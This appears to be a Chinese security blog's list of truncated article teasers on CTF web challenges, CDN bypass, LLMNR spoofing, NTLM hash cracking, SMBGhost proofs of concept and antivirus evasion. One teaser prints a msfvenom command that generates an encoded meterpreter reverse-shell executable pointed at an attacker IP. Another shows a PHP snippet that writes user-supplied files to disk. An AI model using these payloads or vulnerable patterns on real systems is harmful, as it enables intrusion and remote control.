php://filter绕过

0x00 情况1: <?php highlight_file(__FILE__); $filename = $_POST['filename']; $content= $_POST['content']; if(isset($content)&&isset($filename)) {     file_put_content...

2020首届太湖杯|writeup

Web 0x01 checkingame 0x02 easyweb0x03 crossfire0x04 ezmd5 0x01 checkingame 浏览器从Sources看下js, config.js和game.js弹出flag 的函数被加密,但限制时间的重载页面可以利用burp...

绕过CDN查询真实IP方法(总结)

近期朋友问我帮忙查询一主站的真实ip地址,那我顺便来总结一下如何绕过CDN来找到目标站点的真实ip 先来个小科普: 什么是CDN加速? CDN的全称是 Content Delivery Network,即内容分发网络,这...

LLMNR/NBT-NS欺骗攻击

简介  LLMNR&NBT-NS 欺骗攻击是一种经典的内部网络攻击,然而由于一方面了解它的人很少,另一方面在Windows中它们是默认启用的,所以该攻击到现在仍然是有效的。在本文中,我们首先为读者解释什么...

LM NTML NET-NTLM2理解及hash破解

LM  Windows Vista / Server 2008已经默认关闭,在老版本可以遇到,但根据windwos的向下兼容性,可以通过组策略启用它(https://support.microsoft.com/en-us/help/299656/how-to-prevent-windows-from-...

(CVE-2020-0796)漏洞POC汇总

0x00 概述 20200310,microsoft透露了一个smb v3协议漏洞。20200312,microsoft出补丁。漏洞命名:smbghost/deepblue......Microsoft Server Message Block 3.1.1(SMBv3)协议处理某些请求的方式中存在远程...

免杀msfvenom和msf5

msfvenom各平台生成木马大全: windows:msfvenom -a x86 --platform Windows -p windows/meterpreter/reverse_tcp LHOST=攻击机IP LPORT=攻击机端口 -e x86/shikata_ga_nai -b 'x00x0axff' -i 3 -f exe -opayl...